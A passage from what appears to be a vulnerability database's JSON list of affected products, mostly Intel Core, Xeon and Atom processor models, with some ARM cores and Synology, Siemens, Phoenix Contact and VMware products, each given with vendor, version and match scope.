1.0, "vendor": "intel", "version": null }, { "model": "virtual machine manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.2-23739" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e6540" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1535m_v6" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5020u" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3955" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "870" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "970" }, { "model": "xeon e5 2403 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2643 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330te" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6500te" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4110e" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5647" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "920xm" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3120me" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5015u" }, { "model": "xeon e5 2407", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6500" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2537m" }, { "model": "xeon e3 1501l v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8893_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4220y" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650l" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x7560" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100te" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "ec5549" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700hq" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4300m" }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3826" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100e" }, { "model": "xeon e5 2470", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700ec" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2810" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5850eq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5850hq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3770" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735g" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "540m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690" }, { "model": "vl ppc 3000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "simatic itc2200", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "3.1" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770k" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6500t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2320" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2530" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3470" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6400" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2600s" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3480" }, { "model": "bl2 ppc 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e5 2650 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y71" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3245" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4410e" }, { "model": "cortex-a76", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "dl ppc21.5m 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6685r" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880l_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4170" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5560" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5650" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "520e" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4667_v3" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3450" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5575r" }, { "model": "neoverse n1", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2550k" }, { "model": "xeon e5 2430", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3736g" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2803" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4600m" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4607_v2" }, { "model": "simatic itc1500", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "3.1" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2100t" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3795" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700mq" }, { "model": "vl bpc 2000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4202y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7660u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5005u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660_v2" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3612qe" }, { "model": "valueline ipc", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5672" }, { "model": "xeon e5 2430 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4250u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7920hq" }, { "model": "xeon e3 1245", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "esxi", "scope": "eq", "trust": 1.0, "vendor": "vmware", "version": "5.5.0" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3437u" }, { "model": "vl2 ppc9 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658_v4" }, { "model": "cortex-r7", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4720hq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658_v2" }, { "model": "visunet rm shell", "scope": "eq", "trust": 1.0, "vendor": "pepperl fuchs", "version": null }, { "model": "xeon e5 2650l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2310m" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2518" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1900" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2310" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699a_v4" }, { "model": "xeon e5 2603 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2628l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1278l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160f" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4702hq" }, { "model": "xeon e5 2620", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6144" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3200rk" }, { "model": "xeon e3 1240 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y54" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3210" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4350t" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7210f" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3130m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3615qm" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y10a" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5570" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "870s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2405s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3550s" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5660" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640_v4" }, { "model": "xeon e5 2643 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4010y" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8153" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3130" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830_v4" }, { "model": "vl2 ppc 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3689y" }, { "model": "xeon e3 1270", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680_v3" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3708" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "840qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610_v4" }, { "model": "cortex-a57", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "bl ppc15 3000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e3 1245 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2408l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2358" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2710qe" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3540" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8891_v4" }, { "model": "xeon e5 2428l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2650l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "560m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2375m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200h" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x7542" }, { "model": "vs960hd", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": null }, { "model": "cortex-a9", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620" }, { "model": "xeon e5 2640", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4810mq" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2920" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210h" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4360t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4340" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "370m" }, { "model": "xeon e5 1680 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4112e" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3060" }, { "model": "cortex-a78ae", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697a_v4" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6152" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "680" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5350h" }, { "model": "xeon e3 1220l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4607" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3745" }, { "model": "xeon e5 2428l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5640" }, { "model": "xeon e5 2637 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2677m" }, { "model": "dl ppc18.5m 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5500u" }, { "model": "xeon e3 1240 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4617" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4667_v4" }, { "model": "xeon e3 1275 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1225", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6600k" }, { "model": "xeon e3 1275l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "975" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4000m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "920" }, { "model": "skynas", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": null }, { "model": "xeon e5 2637 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8893_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3450" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3610qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4402e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6600" }, { "model": "xeon e5 2650 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8164" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5530" }, { "model": "simatic itc1900", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "3.1" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697_v4" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3808" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8158" }, { "model": "atom x7-e3950", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "bl bpc 2001", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "local service management system", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4460t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4260u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6360u" }, { "model": "xeon e3 1220 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2683_v3" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3538" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2760qm" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3710" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2300" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3775" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2508" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3445" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7235" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w3670" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4114" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4710mq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735e" }, { "model": "cortex-a73", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8170m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5680" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2460" }, { "model": "xeon e5 2620 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "dl ppc15m 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8860_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3610me" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6130t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3475s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8600k" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3775d" }, { "model": "xeon e3 1125c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4005u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2610ue" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7820hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3517ue" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2870_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210y" }, { "model": "xeon e5 2648l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1275", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2700k" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4600u" }, { "model": "xeon e5 1650 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2450 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "cortex-a77", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4310u" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6138f" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "860s" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3115c" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660lm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4785t" }, { "model": "xeon e3 1230l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870" }, { "model": "workstation", "scope": "lt", "trust": 1.0, "vendor": "vmware", "version": "12.5.8" }, { "model": "xeon e3 1270 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4288u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2637m" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3570" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2316" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2125" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3330s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4590t" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6600t" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y70" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5609" }, { "model": "xeon e5 2609", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2630 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2630l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1558l_v5" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2629m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5600u" }, { "model": "xeon bronze 3106", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "980x" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4760hq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3770d" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "460m" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3355" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6126t" }, { "model": "vl2 ppc 3000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3590" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4350" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5700hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2600k" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2516" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5677" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4110m" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8890_v4" }, { "model": "bl rackmount 2u", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5502" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5620" }, { "model": "xeon e5 2440 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6128" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3210m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770r" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8176" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3858" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650_v4" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n4100" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "11" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300hq" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5606" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2580" }, { "model": "vl ipc p7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e5 2623 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4500u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770te" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3615qe" }, { "model": "xeon e3 1290", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y31" }, { 